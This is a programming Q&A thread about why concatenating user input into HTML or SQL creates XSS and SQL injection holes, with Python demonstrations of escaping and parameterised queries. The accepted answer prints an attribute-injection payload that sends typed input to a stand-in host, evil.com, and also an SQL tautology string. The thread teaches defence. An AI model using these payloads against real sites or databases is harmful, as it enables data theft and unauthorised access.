drjtua5953 2011-12-05 02:18
Views: 58
Accepted

Why/how does concatenation lead to XSS or SQL injection vulnerabilities?

I was told recently (on here) that concatenating your Javascript will cause XSS vulnerabilities. I have done my research on here and on Google to find out why this is bad, but I am not seeing it.

Part 1 - Javascript: Apparently something like this is the unsafe way. Why? How should you do it instead?

// part of a script dynamically making table rows
var el = document.createElement('div');
el.innerHTML = '<input type="text"  id="myId'+id+'"  />';
cellOne.appendChild(el);

Part 2 - MySQL: I was told that when you concat SQL, it exposes you to SQL injections. I am not sure what they meant by concat SQL exactly. I assume they were not talking about the SQL concat function. I am guessing they meant:

$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";

Or maybe?

$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
$sql .= " AND `col2` = '".$myvar."' ";

Does this expose you to SQL injection?

The SQL part is academic. I use PDO to prevent SQL injection.
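The question's Part 1 snippet is browser JavaScript, but the mechanism is purely a string-level one and can be shown without a browser. The following is an added Python example, not code from the asker or from any answer: it builds the same `<input>` markup two ways, once by pasting the `id` value straight in (as the question does) and once after escaping it for an HTML attribute context, then inspects which attributes the resulting tag carries. `BENIGN_ID` and `MALICIOUS_ID` are constructed sample values; the malicious one has the shape of the accepted answer's payload with a harmless handler body (assumption: `alert(1)` stands in for any script), and the attribute extractor is a deliberately crude regex that only works on a single flat tag.

```python
import html
import re

# Constructed sample values standing in for the `id` variable in the question's
# JavaScript. MALICIOUS_ID follows the shape of the accepted answer's payload,
# with a harmless handler body (assumption: alert(1) stands in for any script).
BENIGN_ID = "row42"
MALICIOUS_ID = '" onchange="alert(1)" bla="'


def build_input_unsafe(user_id: str) -> str:
    """Mirror the question's JS: the raw value is pasted into an attribute.

    A double quote inside user_id closes the id="..." attribute early, and
    whatever follows is parsed as further attributes of the <input>, event
    handlers included."""
    return '<input type="text" id="myId' + user_id + '" />'


def build_input_safe(user_id: str) -> str:
    """Same markup, but the value is escaped for an HTML attribute context.

    html.escape(quote=True) rewrites " as &quot; (and & < > as entities), so
    the browser keeps the whole value inside the id attribute."""
    return '<input type="text" id="myId' + html.escape(user_id, quote=True) + '" />'


# Crude attribute-name extractor used only to inspect the generated markup
# (assumption: a single flat tag whose attribute values are double-quoted).
_ATTR_RE = re.compile(r'\s([A-Za-z-]+)="')


def attribute_names(markup: str) -> list:
    """Names of the attributes a naive parser would see on the tag."""
    return _ATTR_RE.findall(markup)


def has_event_handler(markup: str) -> bool:
    """True if the markup carries any on* attribute, i.e. injected script."""
    return any(name.lower().startswith("on") for name in attribute_names(markup))


if __name__ == "__main__":
    for label, builder in (("unsafe", build_input_unsafe), ("safe", build_input_safe)):
        markup = builder(MALICIOUS_ID)
        print(label, attribute_names(markup), has_event_handler(markup))
        print("   ", markup)
```

With the malicious value, the unsafe builder yields a tag with four attributes, one of them an `onchange` handler, while the escaped builder yields the intended two (`type`, `id`) with the payload inert inside the `id` value. In the browser itself the simpler fix is to not assemble HTML text at all: create the input with `document.createElement('input')` and assign `el.id = 'myId' + id` (or `el.setAttribute('id', ...)`), so the value is stored as an attribute value and never parsed as markup.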


3 answers

  • doujing1858 2011-12-05 02:24

    Part 1

    It can be, if id comes from user input that persists on the page.

    The id variable may contain...

    " onchange="(new Image).src='http://evil.com/user-input=' + this.value;" bla="
    

    Part 2

    Unless those variables are escaped using the correct mechanism, there is a vulnerability.

    The $myvar variable may contain...

    ' OR 1='1
    
    This answer was selected by the asker as the best answer.
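To make the answer's Part 2 concrete, here is an added Python example (not code from the asker or the answerer) that runs the question's second PHP query shape against an in-memory SQLite table, first built by string concatenation exactly as in the question and then with bound placeholders, which is what PDO prepared statements do. The table and its rows are constructed for the demonstration. The injected value is the answer's payload with both sides of the tautology quoted (`' OR '1'='1`): SQLite compares the integer literal `1` and the text literal `'1'` without coercion, so the answer's exact `1='1'` form would evaluate as false in SQLite, whereas MySQL coerces it to true.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for `table`/`col`/`col2`."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (col TEXT, col2 TEXT)")
    conn.executemany(
        "INSERT INTO t VALUES (?, ?)",
        [("alice", "x"), ("bob", "y"), ("carol", "z")],
    )
    return conn


# The answer's payload with both sides of the tautology quoted, because SQLite
# does not coerce the integer literal 1 to match the text literal '1'.
INJECTED = "' OR '1'='1"


def render_concat(filtered: str, myvar: str) -> str:
    """Mirror the question's second PHP snippet: the values become SQL text."""
    sql = "SELECT col FROM t WHERE col = '" + filtered + "'"
    sql += " AND col2 = '" + myvar + "'"
    return sql + " ORDER BY col"


def query_concat(conn: sqlite3.Connection, filtered: str, myvar: str) -> list:
    """Run the concatenated statement; a quote in myvar rewrites the WHERE clause.

    With INJECTED the clause becomes
        col = 'alice' AND col2 = '' OR '1'='1'
    and AND binds tighter than OR, so every row matches."""
    return [row[0] for row in conn.execute(render_concat(filtered, myvar))]


def query_param(conn: sqlite3.Connection, filtered: str, myvar: str) -> list:
    """Bound placeholders: the values travel separately from the statement text,
    so they are compared as data and can never change the statement's structure."""
    sql = "SELECT col FROM t WHERE col = ? AND col2 = ? ORDER BY col"
    return [row[0] for row in conn.execute(sql, (filtered, myvar))]


if __name__ == "__main__":
    db = make_db()
    print("benign, concat:  ", query_concat(db, "alice", "x"))
    print("benign, param:   ", query_param(db, "alice", "x"))
    print("injected, concat:", query_concat(db, "alice", INJECTED))
    print("injected, param: ", query_param(db, "alice", INJECTED))
```

For the benign input both variants return just `alice`; for the injected input the concatenated version returns every row while the parameterised one returns nothing, because it looks for a `col2` literally equal to the payload string. This also answers the first snippet's `$myFilteredVariable`: a filter only helps if it escapes correctly for the exact SQL dialect and quoting context the value lands in, whereas placeholders remove that dependency entirely.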